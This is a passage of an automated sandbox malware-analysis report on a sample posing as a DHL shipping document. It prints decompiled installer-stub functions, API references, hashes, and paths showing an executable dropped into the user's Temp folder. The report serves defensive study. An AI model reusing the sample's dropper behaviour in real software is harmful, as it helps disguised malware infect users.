                                                              0x00402f7a
                                                              0x00402f30
                                                              0x00402f35
                                                              0x00402f37
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f3f
                                                              0x00402f44
                                                              0x00402f45
                                                              0x00402f45
                                                              0x00402f52
                                                              0x00402f5a
                                                              0x00402f61
                                                              0x00000000
                                                              0x00402f8a
                                                              0x00000000
                                                              0x00402f69
                                                              0x00402ef5
                                                              0x00402f08
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f08
                                                              0x00402f90

                                                              APIs
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CloseEnum$DeleteValue
                                                              • String ID:
                                                              • API String ID: 1354259210-0
                                                              • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                              • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                              • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                              • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                              0x00401d81
                                                              0x00401d85
                                                              0x00401d9a
                                                              0x00401d87
                                                              0x00401d89
                                                              0x00401d8f
                                                              0x00401d8f
                                                              0x00401da0
                                                              0x00401da3
                                                              0x00401dad
                                                              0x00401db0
                                                              0x00401db8
                                                              0x00401dc9
                                                              0x00401dcc
                                                              0x00401dd7
                                                              0x00401dce
                                                              0x00401dd0
                                                              0x00401dd0
                                                              0x00401ddb
                                                              0x00401de5
                                                              0x00401e0c
                                                              0x00401e1b
                                                              0x00401e29
                                                              0x00401e31
                                                              0x00401e39
                                                              0x00401e39
                                                              0x00401e42
                                                              0x00401e48
                                                              0x00402ba4
                                                              0x00402ba4
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                              • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                              • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                              • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 73%
                                                              			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                              0x00401e4e
                                                              0x00401e59
                                                              0x00401e5b
                                                              0x00401e68
                                                              0x00401e7f
                                                              0x00401e84
                                                              0x00401e91
                                                              0x00401e96
                                                              0x00401e9a
                                                              0x00401ea5
                                                              0x00401eac
                                                              0x00401ebe
                                                              0x00401ec4
                                                              0x00401ec9
                                                              0x00401ed3
                                                              0x00402638
                                                              0x0040156d
                                                              0x00402ba4
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401E51
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                              • ReleaseDC.USER32 ref: 00401E84
                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                              • String ID:
                                                              • API String ID: 2584051700-0
                                                              • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                              • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                              • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                              • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 59%
                                                              			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                              0x00401c43
                                                              0x00401c45
                                                              0x00401c4c
                                                              0x00401c4f
                                                              0x00401c52
                                                              0x00401c5c
                                                              0x00401c60
                                                              0x00401c63
                                                              0x00401c6c
                                                              0x00401c6c
                                                              0x00401c6f
                                                              0x00401c73
                                                              0x00401c7c
                                                              0x00401c7c
                                                              0x00401c7f
                                                              0x00401c83
                                                              0x00401c85
                                                              0x00401cda
                                                              0x00401cdc
                                                              0x00401ce7
                                                              0x00401cf1
                                                              0x00401cf4
                                                              0x00401cf4
                                                              0x00401cfd
                                                              0x00000000
                                                              0x00401c87
                                                              0x00401c8e
                                                              0x00401c90
                                                              0x00401c93
                                                              0x00401c99
                                                              0x00401ca0
                                                              0x00401ca3
                                                              0x00401ccb
                                                              0x00401d03
                                                              0x00401d03
                                                              0x00401ca5
                                                              0x00401cb3
                                                              0x00401cbb
                                                              0x00401cbe
                                                              0x00401cbe
                                                              0x00401ca3
                                                              0x00401d06
                                                              0x00401d09
                                                              0x00401d0f
                                                              0x00402ba4
                                                              0x00402ba4
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                              • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                              • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                              • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 91%
                                                              			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                              0x00406544
                                                              0x00406546
                                                              0x0040655b
                                                              0x0040655e
                                                              0x00406563
                                                              0x00406568
                                                              0x004065a6
                                                              0x004065a6
                                                              0x0040656a
                                                              0x0040657c
                                                              0x00406587
                                                              0x0040658d
                                                              0x00406598
                                                              0x00000000
                                                              0x00000000
                                                              0x00406598
                                                              0x004065ac

                                                              APIs
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,?,?,0040679D,80000002), ref: 0040657C
                                                              • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000000,00422728), ref: 00406587
                                                              Strings
                                                              • "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy, xrefs: 0040653D
                                                              • ('B, xrefs: 0040655B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy$('B
                                                              • API String ID: 3356406503-2577378190
                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 58%
                                                              			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                              0x00405f38
                                                              0x00405f45
                                                              0x00405f46
                                                              0x00405f51
                                                              0x00405f59
                                                              0x00405f59
                                                              0x00405f61

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-3081826266
                                                              • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                              • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                              • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                              • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 89%
                                                              			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                              0x00405642
                                                              0x0040564c
                                                              0x00405668
                                                              0x0040568a
                                                              0x0040568d
                                                              0x00405693
                                                              0x0040569d
                                                              0x0040569e
                                                              0x004056a0
                                                              0x004056a6
                                                              0x004056a6
                                                              0x004056b0
                                                              0x00000000
                                                              0x004056be
                                                              0x00405675
                                                              0x004056ad
                                                              0x004056ad
                                                              0x00000000
                                                              0x004056ad
                                                              0x00405681
                                                              0x00405683
                                                              0x00000000
                                                              0x00405683
                                                              0x00405652
                                                              0x00000000
                                                              0x00000000
                                                              0x00405659
                                                              0x00000000

                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0040566D
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
